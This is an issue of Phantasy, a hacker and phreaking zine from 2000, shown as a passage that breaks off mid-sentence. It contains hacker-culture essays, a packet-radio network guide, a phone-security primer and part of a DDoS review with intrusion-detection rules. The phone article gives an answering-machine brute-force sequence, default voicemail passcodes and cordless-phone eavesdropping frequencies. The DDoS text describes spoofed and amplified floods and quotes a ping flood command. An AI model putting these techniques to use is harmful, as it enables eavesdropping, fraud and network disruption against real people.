Copy Link
Add to Bookmark
Report
Phantasy Issue 24 Vol 08
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
= =
- WELCOME TO THE TWENTY-FOURTH ISSUE OF -
= =
- -=>PHANTASY<=- -
= =
- A PUBLICATION AND NEWSLETTER OF -
= =
- THE -
= INTERNATIONAL =
- INFORMATION -
= RETRIEVAL =
- GUILD -
= =
- Hacking, Phreaking, Anarchy, Survivalism, and Commentary -
= =
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Volume Number Eight - Issue Number Twenty-Four - Dated 03/17/2000
Editor-In-Chief is Mercenary : iirg@iirg.org
Staff Writers Are: Thomas Icom : ticom@iirg.org
Black IC : black_ic@iirg.org
---------------------
Table of Discontents:
---------------------
# Selection Author
- ------------------------------------ ----------------
1. Legal Ease & IIRG Information The IIRG
2. The Myth of the "White Hat Hacker" Mercenary/IIRG
3. How To Set Up an Underground
Wireless Data Network - Part I Thomas Icom/IIRG
4. Basic Phone Security Mob Boss
Making and Breaking It
5. "Tribe Flood Network 3000" Mixter
A theoretical review
6. The Nazi Files (Stories of the SS) The IIRG
7. IIRG Signal Intelligence Black IC/IIRG
(SIGINT) Guidelines
8. The Rumor Mill Anonymous Sources
9. FREE the FISH Mercenary/IIRG
10. Letters to the IIRG N/A
11. IIRG and Phantasy Distribution The IIRG
12. Articles We Never Want to See Author Unknown
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [1]: Legal Ease & IIRG Information
OFFICIAL DISCLAIMER...
All Contents of PHANTASY Magazine are (C) Copyright by THE IIRG, all
rights reserved. Nothing may be reproduced in whole or in part without
written permission of the IIRG.
Phantasy Magazine may also NOT be included on any CD-ROM collection
without express written permission of the IIRG.
All information published in PHANTASY is from USER contributed material.
The Publishers and Editors of PHANTASY and THE IIRG disclaim any liability
from any damages of any type that the reader or user of such information
contained within this newsletter may encounter from the use of said
information. All files are brought to you for entertainment purposes only!
We also assume all information infringes no copyrights and hereby
disclaim any liability.
In the future PHANTASY Magazine will be made available quarterly to the
Internet community free of charge. Any corporate, government, legal,
or otherwise commercial usage or possession (electronic or otherwise) is
strictly prohibited without written IIRG approval, and is in violation of
applicable US Copyright laws.
The IIRG (IIRG Mailing Address)
862 Farmington Avenue
Suite 306
Bristol, Connecticut 06010
Here is the IIRG's Public Key:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a
mQCNAjE9nrYAAAEEAKuDXqGRyCw42PStHZMLjOVZ2QhTPklKXv5NK3u0hu/EcBYM
Cib6/jIDwgr3uwRo9DVptYVtGAYIY7/3OXw+B+Vxmb846weUBwcY14mBPrRtAjhI
EnSzHeS477sL1MklTQ+cxmDh8TyaAG8s5n+gKHc2qCQ+FTo6L1WIQPIFCJE5AAUR
tBRJSVJHIDxpaXJnQGlpcmcuY29tPg==
=onlg
-----END PGP PUBLIC KEY BLOCK-----
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [2]: The Myth of the "White Hat Hacker"
By: Mercenary <iirg@iirg.org>
The White Hat Hacker does not exist. I propose that this classification
is a myth. This can be proven with a definition, a brief analysis of why
the term was created, and why this ridiculousness is still flung around
in the media and hacker communities.
First, lets look to see what the term "Hacker" means.
The term "hacker" has been misused by the media since the mid 1980's.
True Hackers are totally different people than what we have been represented
as. One of our main ethics is to allow no harm to come as a result of our
actions. For our purposes here, I will refer to "True Hackers" as
"Classic Hackers".
Classic Hackers are explorers, individuals whose sole interest is
learning as much as possible about the electronic systems that fascinate us.
Some hackers might take excursions into other computer systems, but
Classic Hackers take the utmost care to disturb nothing.
A Classic Hackers goal is not destruction, nor profit, nor revenge.
Our goal is the pursuit of knowledge and the pursuit of conquest.
A Classic Hacker believes that information should be free, and that pushing
the envelope of what is possible should be a daily occurrence.
We believe that every system is ripe for improvement, whether the
system is a computer, a program, a set of traffic lights, or a government.
The term "White Hat Hacker" is a self-proclaimed title of the Hacker
turned businessman. It is a term created in an attempt to justify
selling out to the business community"
The most classic example of this is the "L0pht".
If we look at their FAQ from 1998 we will see that they defined
themselves as "just a bunch of hackers who got together and started
working on projects together". They also claimed that "We're not in
this for the money, or the glory".
But as is the case with many former hackers, MONEY is the deciding
factor when push comes to shove. As we can see in their latest FAQ
they totally disregard their roots and now claim "We strived to be
(and achieved) a pure R&D environment. Unfortunately pure research
and development is not a very profitable arena."
Of course hacking is not profitable. Nobody ever said it was.
Unless you cross the line and become an actual "criminal", you
can expect to make nothing off your activities.
I have no problem with Hackers switching to security consulting.
But if you become a security consultant, you are no longer a Hacker.
By attempting to label yourself as a "White Hat Hacker" you are
just trying to gain your acceptance to possible customers (victims).
Security consultants are businessmen first and foremost, and they
know their prey well.
Can you see the pattern?
A security consulting firm's job is not to protect your company,
a security consulting firm's job is to make money selling protection to
you from demons, real or imagined.
In plain words, when they are working for you they are working for
themselves and this is the case in the entire free market world.
The security consultant title is designed to facilitate the deception
that if you have enough money, someone will take care of your problem
rather than you learning how to solve our own security issues.
Now I am sure you have heard by now that the government is waging a
major propaganda war against the on-line hacker community with the help
of the socialist media.
The government and the media are experts on psychology, psychological
warfare, and brainwashing. Between the two groups they know more about
the human mind and behavior, and how to control both.
The anti-hacker movement's main propaganda themes seem to be that
(1) Hackers are the root of all on-line evil.
(2) That the government, (through more restrictive legislation)
is the business community's only hope against the spreading
plague of computer crime.
To understand the anti-hacker movement, we must understand what
propaganda is.
Simply put, propaganda can be outright lies, distorted facts, and/or
truth, combined to change a person's thoughts on a subject.
Now it has been known for sometime by the Central Intelligence Agency
that countries such as Russia and China are developing tools to attack
commercial computer networks.
Even FBI Director Louis Freeh says that we face a "very serious" espionage
threat from China. Organized Chinese fraud rings on the mainland and overseas
are hacking databases to compromise credit and identity details.
"The Chinese gangs have moved into the electronic age where they're using
hacking techniques and Internet theft," US Secret Service Special Agent
Gregory Regan explained in testimony before the Senate Judiciary
Subcommittee on Technology, Terrorism and Government Information.
Yet with these undeniable allegations by the governments own lackeys,
Janet Reno wants to go after the so called "evil 15 year old hackers",
when it looks like they should have their sights targeted elsewhere.
What makes this all so much worse is that the "White Hat Hackers" who
once claimed that "We're not in this for the money, or the glory" are
testifying before the Senate and strolling up to every TV camera they
can find supposedly speaking for a community they have actually have no
part in anymore.
The main problem with the media is that they glorify what I like to call
"hacking misfits". The only hackers, crackers, or script kiddies who get
glorified by the media are those who messed-up and got caught.
The media loves the term "White Hat Hacker", it lets them put across
the propaganda of community cannibalism.
Hackers turn against their own kind.
Lets get the story right folks, these are not hackers, they are paid
Security consultants out to make money selling protection to you for
something you could easily correct yourself".
If you have problems with a "hacker", it's not a Classic Hacker.
You have a computer criminal on your hands.
Hackers do not brag in public IRC channels. Hackers do not testify in
front of Senate committees. If you've been hacked by a "Classic Hacker"
and he's done it right - you'll never even know it.
So lets get the terminology straight.
1. Security Consultant - what former hackers become when they sell
out their ideals and community.
2. Computer Criminal - anyone who uses a computer for monetary gain
or illegal activity resulting in damage.
3. White Hat Hacker - no such animal or mammal.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [3]: How To Set Up an Underground Wireless Data Network - Part I
By: Tom Icom <ticom@iirg.org>
Introduction
============
Sending data over the airwaves actually predates the Internet. Back in
the 60s, Hams were using a 5-bit code known as Baudot to communicate over
HF amateur bands. The devices used were large electromechanical affairs
known as Teletypes, and ran at speeds of 45 and 75 baud. Baudot is still
used on HF, along with ASCII running at 110 and 300 baud, and other more
modern digital modes such as AMTOR and PSK. Back in the late 80s, Packet
Radio made its appearance running AX.25 (a ham radio version of X.25 used
by packet switched networks) at 300 and 1200 baud. Hams set up a massive
AX.25 digital network stretching on the east coast from Maine to Florida
and inland to the Mississippi River.
The rise of the Internet, however, caused the decline of packet
radio's popularity. Packet radio requires an amateur radio license, where
the Internet does not. Packet Radio's top speed for the average end user
is generally limited to 9600 baud, with 1200 baud being most common. The
average Internet user comes in at 56K baud over the phone lines, and
faster if they use a cable modem. Packet radio requires more technical
expertise to get up than Internet service. This is all beyond the means
and intelligence of the average DOS/Exploit/Script "hacker", whose main
concern appears to be acting his sexual frustrations out on random
computer systems.
Certain "white hat hacker" groups (AKA - Security Consultants)
have been attempting to implement a wireless "underground" network.
This has been unsuccessful to date because of their insistence of wanting
a wireless high speed TCP/IP backbone with a ton of superfluous bells and
whistles as the foundation of their network, legal issues with accessing
the Internet via the Amateur Bands, short range and high cost of Part 15
wireless networking devices, and a general lack of serious interest among
many of the "hackers" they recruit. With many "white hats" now doing
infosec for corporate interests in a blatant manner, one must begin to
wonder just how "underground" such a network would be if implemented.
Other hobbyist organizations have implemented wireless Internet on a
small scale in their locales. While this is all fine and dandy, I don't
consider them underground networks due to the fact that they are operating
in a totally overt manner and are connected to the Internet. Let's face
it. The Internet is great for downloading technical and product support
information, emailing friends and family, expanding one's non-computer
hobbies, and getting the latest news and weather. As the basis for an
underground network it quite frankly sucks, and I fully expect the Feds to
step in and muscle more restrictions on it in the future. It is happening
in the same way it started with our Second Amendment rights,
highly-publicized incidents followed by a call to action by the "experts".
If you're looking to be able to surf the web, and download megabyte
multimedia files in 30 seconds while at the beach for only $19.95 +
shipping and handling FORGET IT. If you want to be a part of an effective
wireless underground network, then I will show you how, and it will work.
The equipment is inexpensive, and is available off the shelf at any
business that sells amateur radio equipment. The cost of the equipment can
be as little as $200 per station PROVIDED you are willing to expend the
effort to do so. Battery-operated stations are cable of being fitted into
a .50 caliber military surplus ammo can with a solar powered trickle
charger, and placed on a remote hilltop to act as relay stations for
months of unattended operation. While this network does not have
indigenous encryption, it will support the encryption system of your
choice. This, like other aspects of the network, allows you to customize
specifics to suit your needs, thus increasing OPSEC (operational
security). I'm of the belief that telling the world what type of
encryption you're using only gives your enemies one more thing with which
to screw you with. While it may be fine and dandy for the white hat
hackers and academic idiots to allow themselves to play with each other's
crypto, we are simply interested in good COMSEC (Communications Security).
There is plenty of information out there as to what works and what
doesn't. If you decide to use a Caesar cipher on your system you have no
one to blame but yourself.
Equipment
=========
You will only need the following to get up and running. You will need
a radio. Most people acquire a 2m/70cm dual-band ham HT that has been
modified for out of band use. These radios typically have a maximum power
output of five watts over a frequency range of 140-174 and 420-470 MHz.
You may also upgrade to a base/mobile unit which offers a power output of
25-50 watts depending on the make and model. You will need a Terminal Node
Controller. This is a 1200 baud AX.25 radio modem that interfaces between
your terminal and your radio. You will need an RS-232 terminal. You can
use anything that has an RS-232 port; PC, Mac, C64, Atari, or even an old
DEC VT-100 terminal if that's what you have. All the work is done via the
TNC. You will need some sort of antenna system. All HTs come with a stock
rubber duck antenna, but you should upgrade to at least a home-built
dipole, 1/4 wave vertical, or j-pole antenna. With a good antenna, even
running 5 watts will give you decent range. You will need a 12 volt power
supply. For a little 5 watt HT you can get by with you basic 3 AMP Radio
Shack supply. A 50 watt mobile will require a larger 20 Amp supply such as
an Astron or similar make. Hooking all this stuff up is relatively
simple. Specific instructions will be included with the equipment you
purchase, but will be along these lines:
\|/ Antenna /-----------------------+----------Power Supply
| | |
| +--------------+ /-----\
| Coax | |-Speaker----| | Computer Running
\-Cable-| Radio |-Mic Audio--| TNC |-RS-232-- Terminal Program
Feed | |-Mic PTT----| |
+--------------+ \-----/
Not too difficult, is it? THAT is the foundation of the IIRG's
network NEWNet: New England Wireless Network, and that's all you need in
order to get access. With this simple set-up, you have the capability of
both maintaining a local commo net with your group, and integrating with
larger networks consisting of other groups in your region.
In future issues of Phantasy, I will detailing more of the nuts,
bolts, hints and kinks involved in setting up a functional underground
wireless digital communications network. Comments and questions can be
emailed to ticom@iirg.org and there is also a room dedicated to this
purpose up on our telnet BBS PFTE (telnet: luna.iirg.org uid:BBS no p/w).
======================================================================
Thomas Icom, IIRG - <ticom@iirg.org>
International Information Retrieval Guild, "May Odin guide your way!"
<http://www.iirg.org/~ticom/> VMB: 877-570-5970 x570
======================================================================
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [4]: Basic Phone Security - Making and Breaking It
By: Mob Boss <mafia_man777@ureach.com>
The other day I was sitting in class and I was bored out of my head so
I picked up a dictionary. I was curious to see how a hacker was defined,
considering that seems to be one of the most passionately fought arguments,
good against evil, hackers against crackers.
I found the definition to be "A computer enthusiast, someone who breaks
into computers". Not suprising but when I went to look for "Phreak" and
"Phone Phreak", low and behold, it was not there. This seems to be common
these days. Everyone is shaking in their boots about big, bad, evil hackers
and what might happen to their home or business computer, but no one ever
stops to think about the phone system.
This article is not geared towards anyone specific, in fact this is just
an abstract to guide all those who are interested in general security,
privacy, and H/P. Whether your a small business owner, a homemaker, or an
executive, there is something here that you should know, if you don't
already.
Phone Phreaking can be loosely defined as the exploration and exploitation
of the phone system and everything that goes along with it. Back in the 60's
and 70's there was blue boxing, back in the eighties and early nineties there
was red boxing, but nothing compares to the things that are here now, in the
early part of the 21st century. Seems everything is hooked up to the phone
system one way or another these days.
People are sporting voicemail, pagers, cell phones, home answering machines,
fax machines, computers hooked up to the internet, cell phones hooked up to
the internet, and there are plans to have cars on the internet pretty soon
as well, (i.e. 2600 issue 16:4, I OWN YOUR CAR).
1984 is here, just a little late .
Now considering all that why would someone ignore learning about the phone
system considering the whole backbone of telecommunications is the phone
system. That's a mistake a lot of companies and individuals make.
Besides theft of phone service, as there are so many legal ways to make a
free call these days, but how about privacy. How would you like someone
monitoring your business via the voicemail system or maybe monitoring your
house by using the remote access feature on your answering machine to
actually listen in on what's going on. How about someone tapping your analog
cell phone or old cordless phone?
Now from the attackers point of view, what better way to watch a target?
You want to break into a computer network, monitor the voicemail systems for
possible technical information and logins. You want to break into a house,
listen to messages on the answering machine to find out the patterns of
those who reside there. Want to blackmail, extort, and steal, well then
there are tons of possibilities for you.
Lets start at home. What communication devices do you own?
Cordless phone, PC, Fax machine, answering machine? I'm willing to bet you
have at least one or all of those items in your home. First I will touch on
answering machines, personally I could live without it. Most people hate
talking on answering machines , and when its not meant to be its not meant
to be. But I still own one and the first thing I did when I learned about
breaking into answering machines was to check my manual to see if my machine
had remote access. As it turned out, it did have remote access but lucky for
me it has a strong security policy, two bad tries will boot you off, plus the
code is a good one. Now machines I have encountered in businesses
and homes were as easy as dialing 123 after the tone.
So what you say? You have nothing to hide? Well privacy is privacy and
either way I don't want some thug hearing when I'll be at the dentist or
vacation. This is twice as bad if you're a business and you have customers
leave orders on the phone after hours.
Credit card fraud has been booming since the 1980's and two decades later
its still a problem, and its a safe bet that it always will be a problem.
Here is an easy to follow system for getting into an answering machine, out
of the many techniques I have read, tried, or heard of this one is the most
rewarding...
after the tone start dialing this sequence,
9876543210000123456789 then 2000, 3000, till you hit 9000, then
1111, 2222, and so on till you hit 9999.
That technique will break into answering machines in the homes of
government officials, mail order stores, and places that should be more
secure. Try that on your machine or a friends (with his permission of
course) and see how secure that answering machine really is.
Another problem that has been around for many years is that of people
tapping cordless phones with simple frequency scanners. Now this problem
has been dying out but when I flip on the Ol' Bearcat I still hear morons
yacking away on there old, ten dollar, garage sale, cordless phones.
These aren't wholesome conversations either. Drug deals, phone sex, and
fights. I guess it all depends on where you live but just the same there
are a lot of possibilities here. Like I said, this is not a new problem,
but its still wide spread even though a whole decade of cordless terror
has gone by.
By programming the following frequencies into your scanner
you'll here many conversations:
Base Handset
1 43.720 48.760
2 43.740 48.840
3 43.820 48.860
4 43.840 48.920
5 43.920 49.000
6 43.960 49.080
7 44.120 49.100
8 44.160 49.160
9 44.180 49.200
10 44.200 49.240
11 44.320 49.280
12 44.360 49.360
13 44.400 49.400
14 44.460 49.480
15 44.480 49.500
16 46.610 49.670
17 46.630 49.845
18 46.670 49.860
19 46.710 49.770
20 46.730 49.875
21 46.770 49.830
22 46.830 49.890
23 46.870 49.930
24 46.930 49.990
25 46.970 49.970
Obviously you want to listen into the base frequencies so that you hear
both sides of the conversation. Now you may say well I don't have an old
phone, "I have a brand new cordless phone that runs on the 900mhz band
and scrambles the conversation".
The only thing I have to say to that is, what if your business partner,
mistress, and/or accomplice are using a old cordless phone, then your
security measures mean nothing and its out there. That's why you have to
analyze security from afar, missing the big picture will really screw you up.
Are you running a dialup server at your residence or small business?
If you think its safe because no one but you had the dialup then you my
friend are dead wrong. For years people have been using programs called
war dialers (i.e. ToneLoc) to scan exchanges looking for computers and just
because times have changed and the internet seems to dominate all doesn't
mean that people have stopped looking to their local exchanges either.
In fact much can still be found by having a war dialer go for a few hours
and attackers know this. A company can have a big fancy firewall but a
dialup sticking out like a sore thumb a few numbers up from their main
switchboard number. That kind of ignorance can be very, very costly and it
would be wise to see how your computers are set up. If a dialup server is
necessary be sure to pick strong passwords and keep up with a good policy
for protecting that data, physically and remotely.
Lets move on to your small (or large) business.
Most businesses worth anything at least have a small PBX and voicemail
system, plus the kind of stuff you may have at home, as all the same of
rules of home security apply at the office as well. Its very important that
a person takes his sweet time with setting up the phone system, baby it just
as much you would the computer network because leaving the phone system
open will lead the path to your precious network.
If someone gets into your phone system what do you have to lose?
Privacy, valuable information about customers (credit card information),
use of your lines to call Europe and what not.
I must say that PBXs are more challenging now then they were ten years ago
but considering most voicemail systems run hand in hand with the PBX,
having weak passcodes on your voicemail system can lead to exploitation of
your PBX services. Meridian Mail, which is put out by Nortel (www.nortel.com),
for instance has a nice little feature where you can set the operator
assistance number, which in what I have seen is local numbers, just the same
it can be useful for bouncing through to avoid tracing. I don't think
anyone wants their phone system used as a jumping off point for attack
against something big. The same rules of breaking into answering machines
applies to voicemail, but one can get more creative here.
There is usually multiple accounts on a system so if you can't get into one,
move onto another. 999 or 9999 is usually an administrators box and 100 or
1000 is usually a general delivery box. Its been my experience that the
general delivery box can be the most influential as that's where your
general information can be obtained and that's also a very easy box to get
into, a lot of the time the passcode is just
1000. In general though some passcodes to try are the number of the box as
the passcode, 1234, 1111 to 9999, 1000 to 9000, the name of the person or
company in DTMF, and the last four digits of the phone number. Knowing that,
its possible to use these private phone networks for a lot of different
things and I think its very clear why someone should take this into
consideration.
Ok now that its clear that your everyday conversations are at risk lets
talk about some of the ways we can insure that our distant party is the
only other person to hear the conversation. Remember the only secure
conversation is one in person, free of any monitoring. Getting back to the
point, one must consider what level of security is needed for a conversation
before they begin to put security measures in place. For instance I doubt
you need to encrypt a voice conversation with your grandmother (unless she
works for a three letter agency) nor do I think you want to be on that old
cordless phone while buying arms from third world terrorists (not that I'm
advocating that). Lets say you are interested in securing voice
communication, here are some ideas on what you can do to protect your
privacy. The first method is accomplished through PGPphone, a nice little
program from the makers of PGP (Pretty Good Privacy). This program allows
for secure modem to modem or tcp/ip based voice communication. Using PGP keys
at the strength preselected the conversation can be encrypted and secured
from prying ears. Only drawback is that there is a little bit of lag and the
stronger the key, the more static and breakup you will get. Another idea for
shaking any taps on your phone line or your counterparts phone line is
through the use of a number of payphone. If you keep a good list of payphone
numbers in your area that allow for incoming calls you can be at a certain
payphone at a preselected time to receive that call. If its busy you can
always have a backup payphone not too far away or your contact will simply
try back every two minutes. In my area at least there are still some
neighborhood COCOTs (customer owned coin operated telephone) that still take
in calls. Your best bet is to call a voicemail number that has ANI every
time your at a payphone. When you get home call all the payphone numbers you
accumulated and see which ones take in calls. Some owned by the Telco will
not allow the call to go through, some COCOTs will have a modem pick up.
As another approach you could always invest in one of those expensive
communication devices that hook up to the telephone and allow you to call
another telephone with the device. The price is definitely a drawback
($500 area) so using one of the less expensive methods is most likely the
best way to go). Be creative and use your common sense, doing that
you'll come up with many creative ideas.
This was meant simply as a primer to phone security. Yes these are old
problems but they needed to retouched on because it seems many people are
still mystified by simple phone phreaking techniques. There are other phone
risks, such as beige boxing and social engineering, but those topics have
been covered already in some very well detailed articles that are available
on sites all over the internet and fine BBSs like Ripco. I hope this has
opened your eyes to the dangers out there or at least refreshed your memory.
And to cut off all those flames that I ripped this information off and what
not, I have spent many hours on the phone testing and perfecting these
techniques, there is nothing here that I don't have first hand knowledge of.
I'd like to leave off with these words that good friend recently told me,
"When you take from one its plagiarism, but when you take from many its
research.".
Appendix
PGPphone
http://web.mit.edu/network/pgpfone/
Phreaking Info http://come.to/mobdomain
http://www.phonelosers.org
http://www.hackersclub.com/km
-The Mob Boss; http://come.to/mobdomain
Voicemail and fax: 1-877-203-3043
Special Thanks To...
Deo
Ryan
Websulker (http://www.websulker.com)
and anyone else I left out...
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [5]: "Tribe Flood Network 3000": A theoretical review
By: Mixter <mixter@newyorkoffice.com>
-----BEGIN PGP SIGNED MESSAGE-----
"Tribe Flood Network 3000": A theoretical review
of what exactly Distributed DOS tools are, how they can be used,
what more dangerous features can be implemented in the future, and starting
points on establishing Network Intrusion Detection Rules for DDOS.
Many technically uninformed people consider DDOS as a weapon, that should not
be publicly evolved and distributed. This is the only further thing I'll be
releasing to explain DDOS tools, comprehensible for EVERYONE, and future
features that may be implemented in DDOS: a brief theoretical description.
BTW: People with technical knowledge may skip over the most stuff in I. and II.
I. What is distributed DOS, what can it be used for, how does it operate?
II. What are DDOS features, what are future DDOS features, how is DDOS evolving?
III. DDOS, an exploit or not? Should it be published? What is the main problem?
IV. How can DDOS traffic be detected by Network Intrusion Detection (NIDS)?
I.
What is distributed DOS?
Distributed DOS, like any distributed concept, will make it easy to coordinate
a procedure that is launched from many computers. In this case it is Denial
Of Service in form of packet flooding, to overload network links.
DDOS IS NOT A HACKING TOOL CATEGORY. Distributed DOS tools are PENETRATION
tools. They do not exploit security vulnerabilities, but they can demonstrate
what amount of traffic a host can or cannot handle. Distributed DOS has been
used a long time by professional security consultants for penetration testing.
Before there were DDOS attack tools, there have been commercial, non-open-source
programs out that could launch distributed packet floods. Those were used in the
information security consulting business, to perform a security service called
"Capacity Management". The purpose of Capacity Management is to determine how
much traffic a network can handle, to see if the targets bandwidth has to be
improved, or if it can handle enough traffic while providing service reliably.
What can it be used for?
It can overload, or flood if you want, network links. It sends meaningless
packets, the overall amount of data being more that the network can process.
The impact is that the targets can not be reached over a network. That is all.
How does it operate?
The basic concept is that you install a huge amount of DOS servers on different
hosts. They will await commands from a central client. A central client can then
message all the servers, and instruct them to send as many traffic as they can
to one target. The tool distributes the work of flooding a target amongst all
available DOS servers, therefore it is called a distributed concept.
Before these tools were available, an attacker (or penetration tester) would
have to telnet into all the hosts that he wanted to use, log in as a user,
and manually launch a command to flood a target on each of the hosts that
should flood, for example using the UNIX standard tool ping: 'ping -f target'
II.
What are DDOS features?
The actual attack tools don't do simple flooding, but variations of it which
involves using actual weaknesses in a protocol to a) make an attack more
powerful b) make an attack harder to track back. First, current DDOS tools
spoof source addresses. They are sending raw IP packets, and due to the
nature of the internet protocol the source addresses can be fake ones, and
single (not connection oriented) packets will still reach their destination.
This is basically what makes backtracking of the attacks so hard. DDOS is
also exploiting protocol weaknesses, it for example can open up half-open
TCP connections by SYN flooding. This is a very old and well known protocol
vulnerability, and feasible countermeasures are present. To make attacks more
powerful, DDOS can generally use any protocol vulnerability that can be
exploited by sending single, not connection oriented packet traffic to a host.
What are future DDOS features?
Things that can still be implemented, but have not in publicized tools,
are protocol vulnerabilities as mentioned above. One of those is the "stream"
attack (discovered by Tim Yardley, stream.c and spank.c demonstrate the
vulnerability and are public). Stream attack sends TCP packets with either
ACK or both SYN and ACK flags set. Because they are not part of a connection,
they will "confuse" a target machine and take some time to be processed by
the operating system. If this attack is used in a distributed way, the attacker
can overload machines with less hosts. From what I've heard, distributed stream
attack IS already implemented in private DDOS tools. It is very trivial to
implement this feature. Possibility 2 that is not implemented yet are
multicast addresses. Multicast addresses are routed (forwarded) specially by
routers, they can multiply one packet into several ones. The concept would be
to send out packets with a multicast (224.x.x.x) source. A target could send
an error message back to multicast destinations, and multiply the bandwidth.
This concept has also been mentioned by Tim Yardley. Another concept could
be to purposefully send special strings in the flood traffic, strings that
Intrusion Detection Systems (IDS) could falsely interpret as break-in attempts,
the impact would be false alarms and affected IDS could get overloaded or crash.
How is DDOS evolving?
As I mentioned, the first tools that did distributed denial of service were
commercial penetration tools. The origin of using general DOS is certainly
IRC (Internet Relay Chat), where kiddies can take over control of channels if
they temporarily take out computer systems with DOS. The first packet flooding
DOS that involved multiple servers flooding was "smurf". Smurfing relied on
mis-configured networks replying back to a broadcast address, sending one
packet would result in hundreds bouncing back. Then, most of those networks
were fixed, and attackers compromised a lot of hosts, preferably hosts with
high bandwidth, and started flooding manually from them. Because this took
a lot of time, attackers wrote servers which they installed on the hosts
they had compromised. They no longer needed to log in, but only message those
servers. The DDOS attack tools I know of are, in chronological release order:
fapi (private, by ?), blitznet (public, by phreeon), trinoo (private, by
phifli), TFN (public, by me), stacheldraht (private, by randomizer), shaft
(private, by ?), TFN2K (public, by me), Trank (TRinoo + spANK.c?, private).
The recent development has also continued in other ways, since people were
monitoring traffic for very DDOS-program-specific traffic (like known character
strings, known passwords, default ports), there have been many small variations
made to the code of the above tools, by attackers, to prevent being detected.
III.
DDOS, an exploit or not?
No. DDOS itself is not an exploit. It just makes an existing concept more
easy. Take the distributed.net RC5 challenge and distributed password crackers.
They are not exploits. But they are exposing a weakness, that many passwords
can be brute forced faster than people think. DDOS shows that many networks
are not as strong as they seem to be and can be overloaded faster than people
used to think. Additionally, there are actual exploits implemented in DDOS
exploits, that exploit security holes in network protocols currently used
on the Internet. These security holes must not necessarily be exploited to
make DDOS possible, but they do make the impact of DDOS attacks more powerful.
Such exploits are the possibility of arbitrarily spoofing IP addresses, SYN
flooding, IP stack attacks with bad fragmentation, header offsets and other
"magic packets", the stream vulnerability, and missing authentication and
security of traffic known as connection-less or stateless.
Should it be published?
That is for you to decide. It is your personal opinion. But people will
continue to publish vulnerabilities. Hundreds of talented security analysts
are professionally researching vulnerabilities in software, and posting
exploit programs, which can often be used to instantly compromise a system
running the vulnerable software at root level. The past has shown, that since
security vulnerabilities were a problem on the internet, people have been
ignoring advisories containing only the information THAT something was
vulnerable to an attack, disregarding them as being "completely theoretic".
Only when people wrote up and posted ready-to-(ab)use vulnerability
exploits, the severity of vulnerabilities became clear, and people would
make an effort to counter those vulnerabilities.
What is the main problem?
The main problem, that made attacks against sites as big as yahoo.com
possible, is the bad overall security on the internet. With ONLY a DDOS
tool in his hands, Joe Attacker cannot do anything. But security vulnerabilities
are omni-present on the majority of hosts on the net. An awful lot of these
hosts are not caring about their security, as a result they are running
software that is KNOWN to be vulnerable, and against which public exploit
programs exist. An attacker has only to run one of the public exploit programs
and he is granted full access to such hosts. And various people have been
able to compromise THOUSANDS of hosts with well-known, old vulnerabilities.
Even high speed university networks, which originally built the foundation
of internet architecture have proven to be insecure. With full control over
thousands of hosts, it is easy to concentrate all of these hosts resources,
and to be able to attack almost anything on the internet.
IV.
How can DDOS traffic be detected by Network Intrusion Detection (NIDS)?
The mistake everyone has been making is to search for default strings of
special DDOS tools, for default values, ports, passwords, etc.
To establish Network Intrusion Detection capability in order to spot these
tools, that operate via connectionless raw packets, people will have to start
looking for general signs of DDOS traffic, signs that are obvious and
traffic that is extensively anomalous and suspicious.
There are two kinds of DDOS-generated traffic, control traffic (between DDOS
client and servers) and flood traffic (between DDOS servers and DDOS victim).
Credits to rain forest puppy, Dave Dittrich, and Axent Security Team
for providing some initial hints I needed to write this up.
Anomaly 0: This is not real "DDOS" traffic, but it can be a viable method
of determining the origin of DDOS attacks. As observed by RFP, an attacker
will have to resolve his victim's hostname before a DDOS attack. BIND name
servers are capable of recording these requests. You can either send them
a WINCH signal with 'kill', or you can specify query logging in the BIND
configuration. A single PTR type query before an attack indicates the request
was made from the attackers host, a great load of PTR type query for a
DDOS victim before an attack indicates that the flood servers have been
fed a host name and each server was resolving the hostname for itself.
Anomaly 1: Amount of bandwidth exceeds a maximum threshold that is
expected normal traffic for a site could cause. Alternatively, the
threshold can be measures in the amount of different source addresses
in the traffic. These are clear signs of flood traffic and ACL rules can be
implemented on the backbone routers that detect these signs and filter traffic.
Anomaly 2: Oversized ICMP and UDP packets. Stateful UDP sessions are
normally using small UDP packets, having a payload of not more than 10
bytes. Normal ICMP messages don't exceed 64 to 128 bytes. Packets that
are reasonably bigger are suspicious of containing control traffic, mostly
the encrypted target(s) and other options for the DDOS server. Once
(non-decoy) control traffic is spotted, one of the DDOS servers' location
is revealed, as the destination IP address is not spoofed in control traffic.
Anomaly 3: TCP packets (and UDP packets) that are not part of a connection.
The stealthiest DDOS tools use random protocols, including connection-oriented
protocols, to send data over non-connection-oriented channels. Using stateful
firewalls or link-state routing can discover these packets. Additionally,
packets that indicate connection requests with destination ports above 1024,
with which no known service is registered and running, are highly suspicious.
Anomaly 4: Packet payload contains ONLY alphanumeric character (e.g. no
spaces, punctuation, control characters). This can be a sign that the packet
payload is BASE64-encoded, and therefore contains only base64 characters.
TFN2K is sending such packets in its control traffic. A TFN2K (and TFN2K
derivatives) specific pattern is a string of repeating A's (AAAA...) in
the payload, since the buffer size is padded by the encryption routine. If
the BASE64 encoding is not used, and the payload contains binary encrypted
traffic, the A's will be trailing binary \0's.
Anomaly 5: Packet payload contains ONLY binary, high-bit characters. While
this can be a binary file transfer (traffic transmitted over ports 20, 21,
80, etc. must be excluded if this rule is applied), especially if contained
in packets that are not part of valid stateful traffic, it is suspicious
of being non-base64 encoded, but encrypted control traffic that is being
